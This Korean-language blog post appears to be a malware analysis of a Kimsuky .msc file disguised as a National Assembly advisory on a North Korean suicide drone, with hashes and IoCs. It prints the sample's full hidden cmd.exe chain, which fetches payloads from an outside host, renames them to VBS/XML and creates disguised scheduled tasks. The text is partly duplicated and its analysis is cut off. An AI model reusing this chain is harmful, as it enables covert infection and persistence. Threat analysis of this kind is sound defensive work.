Kimsuky(김수키) 대한민국 국회 보안 문서 [자문]북한 신형 자폭드론 으로 위장한 악성코드(2024.9.12)
Contents
오늘은 북한 APT Kimsuky(김수키)에서 만든 대한민국 국회 보안 문서 [자문]북한 신형 자폭드론 으로 위장한 악성코드(2024.9.12)에 대해 글을 적어보겠습니다.
일단 실행을 하면 북한 신형 자폭 드론 으로 돼 있으며 당시 러시아-우크라이나 전쟁으로 뜨거웠던 내용 인지라 해당 관련해서 노렸던 것 같습니다.
일단 msc 확장자로 되어져 있으며 8~9월 당시 악성코드라서 지금은 구글 문서 쪽은 동작 안 할 것입니다.
파일명:[자문]북한 신형 자폭드론.msc
사이즈:146,707 Bytes
MD5:391fa4e57f91e3422ef5d32523d4dfc7
SHA-1:f535a3faed62e48d588e190f372785ae9efcadb4
SHA-256:57e9b7d1c18684a4e8b3688c454e832833e063019ed808fd69186c4e20df930a
악성코드 내부 내용
<Task Type="CommandLine" Command="cmd.exe">
<String Name="Name" ID="13"/>
<String Name="Description" ID="14"/>
<Symbol>
<Image Name="Small" BinaryRefIndex="6"/>
<Image Name="Large" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Directory="" WindowState="Minimized" Params="/c mode 15,1&curl -o "c:\users\public\music\default1" "hxxps://petssecondchance(.)larcity.dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam1"&curl -o "c:\users\public\pictures\default1" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam1"&move /y "c:\users\public\music\default1" "c:\users\public\music\default1.xml"&start explorer "hxxps://docs(.)google(.)com/document/d/1Z96Gq8lf7h688L0GeZMgAhjipRX1GLmL/edit"(&)amp;schtasks /create /tn TerminalServiceUpdater /xml c:\users\public\music\default1.xml /f&curl -o "c:\users\public\music\default2" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam2"&curl -o "c:\users\public\pictures\default2" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam2"&move /y "c:\users\public\music\default2" "c:\users\public\music\default2.xml"&move /y "c:\users\public\pictures\default1" "c:\users\public\pictures\default1.vbs"&schtasks /create /tn TermServiceUpdater /xml c:\users\public\music\default2.xml /f&move /y "c:\users\public\pictures\default2" "c:\users\public\pictures\default2(.)vbs""/>
</Task>
코드 분석
WindowState:명령어 실행 시 최소화된 상태로 창이 실행되도록 설정해서 악성코드 사용자는 이게 악성코드 실행이 되었는지 눈치 채지 못함
주요 명령어
curl을 사용한 악성코드 내려받기
curl 명령어:
외부 URL에서 파일을 다운로드하는 명령어
파일 저장 위치는 C:\Users\Public\music 및 C:\Users\Public\pictures 로 설정되어 있으며
공용 디렉터리 사용
웹 경로가 CSS 파일로 …
일단 실행을 하면 북한 신형 자폭 드론 으로 돼 있으며 당시 러시아-우크라이나 전쟁으로 뜨거웠던 내용 인지라 해당 관련해서 노렸던 것 같습니다.
일단 msc 확장자로 되어져 있으며 8~9월 당시 악성코드라서 지금은 구글 문서 쪽은 동작 안 할 것입니다.
파일명:[자문]북한 신형 자폭드론.msc
사이즈:146,707 Bytes
MD5:391fa4e57f91e3422ef5d32523d4dfc7
SHA-1:f535a3faed62e48d588e190f372785ae9efcadb4
SHA-256:57e9b7d1c18684a4e8b3688c454e832833e063019ed808fd69186c4e20df930a
악성코드 내부 내용
<Task Type="CommandLine" Command="cmd.exe">
<String Name="Name" ID="13"/>
<String Name="Description" ID="14"/>
<Symbol>
<Image Name="Small" BinaryRefIndex="6"/>
<Image Name="Large" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Directory="" WindowState="Minimized" Params="/c mode 15,1&curl -o "c:\users\public\music\default1" "hxxps://petssecondchance(.)larcity.dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam1"&curl -o "c:\users\public\pictures\default1" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam1"&move /y "c:\users\public\music\default1" "c:\users\public\music\default1.xml"&start explorer "hxxps://docs(.)google(.)com/document/d/1Z96Gq8lf7h688L0GeZMgAhjipRX1GLmL/edit"(&)amp;schtasks /create /tn TerminalServiceUpdater /xml c:\users\public\music\default1.xml /f&curl -o "c:\users\public\music\default2" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam2"&curl -o "c:\users\public\pictures\default2" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam2"&move /y "c:\users\public\music\default2" "c:\users\public\music\default2.xml"&move /y "c:\users\public\pictures\default1" "c:\users\public\pictures\default1.vbs"&schtasks /create /tn TermServiceUpdater /xml c:\users\public\music\default2.xml /f&move /y "c:\users\public\pictures\default2" "c:\users\public\pictures\default2(.)vbs""/>
</Task>
코드 분석
WindowState:명령어 실행 시 최소화된 상태로 창이 실행되도록 설정해서 악성코드 사용자는 이게 악성코드 실행이 되었는지 눈치 채지 못함
주요 명령어
curl을 사용한 악성코드 내려받기
curl 명령어:
외부 URL에서 파일을 다운로드하는 명령어
파일 저장 위치는 C:\Users\Public\music 및 C:\Users\Public\pictures 로 설정되어 있으며
공용 디렉터리 사용
웹 경로가 CSS 파일로 …
IoC
f535a3faed62e48d588e190f372785ae9efcadb4
391fa4e57f91e3422ef5d32523d4dfc7
57e9b7d1c18684a4e8b3688c454e832833e063019ed808fd69186c4e20df930a
391fa4e57f91e3422ef5d32523d4dfc7
57e9b7d1c18684a4e8b3688c454e832833e063019ed808fd69186c4e20df930a